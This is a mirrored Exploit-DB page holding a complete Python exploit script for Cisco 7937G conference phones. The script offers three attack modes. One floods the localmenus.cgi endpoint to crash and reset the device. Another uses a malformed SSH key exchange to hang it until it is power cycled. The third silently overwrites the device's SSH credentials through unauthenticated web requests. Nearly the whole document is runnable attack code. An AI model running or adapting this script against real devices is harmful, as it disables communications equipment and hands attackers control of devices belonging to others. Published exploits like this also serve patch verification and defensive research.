Cisco 7937G – DoS/Privilege Escalation

• Exploit Database
• 13 阅读

• 作者： Cody Martin
  日期： 2020-11-16
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49057/

• # Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation
  # Date: 2020-08-10
  # Exploit Author: Cody Martin
  # Vendor Homepage: https://cisco.com
  # Version: <=SIP-1-4-5-7
  # Tested On: SIP-1-4-5-5, SIP-1-4-5-7
  #!/usr/bin/python
  
  import sys
  import getopt
  import requests
  import paramiko
  import socket
  import os
  
  
  def main(argv):
  target = ""
  attack = ""
  username = ""
  password = ""
  divider = "====================
  ==========================
  ="
  
  help_text = '''
  exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--u=
  ser username -p/--password password]
  %s
  Example: exploit.py -t 192.168.1.200 -a 1
  Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password=
   villa
  %s
  Attack types:
  1: DoS with automatic device reset
  2: DoS without automatic device reset
  3: Change SSH credentials of target device
  ''' % (divider, divider)
  
  if len(sys.argv) == 1:
  print(help_text)
  sys.exit(2)
  try:
  opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target==
  ", "attack=", "user=", "password="])
  except getopt.GetoptError:
  print(help_text)
  sys.exit(2)
  for opt, arg in opts:
  if opt == "-h":
  print(help_text)
  sys.exit()
  elif opt in ("-t", "--target"):
  target = arg
  elif opt in ("-a", "--attack"):
  attack = arg
  elif opt in ("-u", "--user"):
  username = arg
  elif opt in ("-p", "--password"):
  password = arg
  
  if username != "" and password != "" and attack == "3":
  print("Starting SSH attack!")
  print(divider)
  print("Target: ", target, "\nAttack: ", attack, "\nUser: ", usernam=
  e, "\nPassword: ", password)
  finished = attack_ssh(target, username, password)
  elif attack == "1":
  print("Starting DoS reset attack!")
  print(divider)
  print("Target: ", target, "\nAttack: ", attack)
  finished = dos_one(target)
  elif attack == "2":
  print("Starting DoS non-reset attack!")
  print(divider)
  print("Target: ", target, "\nAttack: ", attack)
  finished = dos_two(target)
  
  print(divider)
  
  if finished == 1:
  print("DoS reset attack completed!")
  elif finished == 2:
  print("DoS non-reset attack completed!")
  print("Device must be power cycled to restore functionality.")
  elif finished == 3:
  tell = "SSH attack finished!\nTry to login using the supplied cre=
  dentials %s:%s" % (username, password)
  connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group=
  1-sha1 %s@%s" % (username, target)
  print(tell)
  print("You must specify the key exchange when connecting or the dev=
  ice will be DoS'd!")
  print(connection_example)
  elif finished == 0:
  print("Something strange happened. Attack likely unsuccessful.")
  sys.exit()
  
  
  def dos_one(target):
  url = "http://%s/localmenus.cgi" % target
  data = "A"*46
  payload = {"func": "609", "data": data, "rphl": "1"}
  print("FIRING ZE MIZZLES!")
  for i in range(1000):
  try:
  r = requests.post(url=url, params=payload, timeout=5)
  if r.status_code != 200:
  print("Device doesn't appear to be functioning or web acces=
  s is not enabled.")
  sys.exit()
  except requests.exceptions.RequestException:
  return 1
  
  return 0
  
  
  def dos_two(target):
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.settimeout(15)
  try:
  sock.connect((target, 22))
  except OSError:
  print("Device doesn't appear to be functioning (already DoS'd?) or =
  SSH is not enabled.")
  sys.exit()
  
  transport = paramiko.Transport(sock=sock, disabled_algorithms={"k=
  ex": ["diffie-hellman-group-exchange-sha1",
   =
  "diffie-hellman-group14-sha1",
   =
  "diffie-hellman-group1-sha1"]})
  
  fd = os.open("/dev/null", os.O_WRONLY)
  savefd = os.dup(2)
  os.dup2(fd, 2)
  
  try:
  transport.connect(username="notreal", password="notreal")
  except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHExcep=
  tion):
  os.dup2(savefd, 2)
  return 2
  
  return 0
  
  
  def attack_ssh(target, username, password):
  url = "http://%s/localmenus.cgi" % target
  payload_user = {"func": "403", "set": "401", "name1": username, "name=
  2": username}
  payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2"=
  : password}
  print("FIRING ZE MIZZLES!")
  try:
  r = requests.post(url=url, params=payload_user, timeout=5)
  if r.status_code != 200:
  print("Device doesn't appear to be functioning or web access is=
   not enabled.")
  sys.exit()
  
  r = requests.post(url=url, params=payload_pass, timeout=5)
  if r.status_code != 200:
  print("Device doesn't appear to be functioning or web access is=
   not enabled.")
  sys.exit()
  except requests.exceptions.RequestException:
  print("Device doesn't appear to be functioning or web access is not=
   enabled.")
  sys.exit()
  
  return 3
  
  
  if __name__ == "__main__":
  main(sys.argv[1:])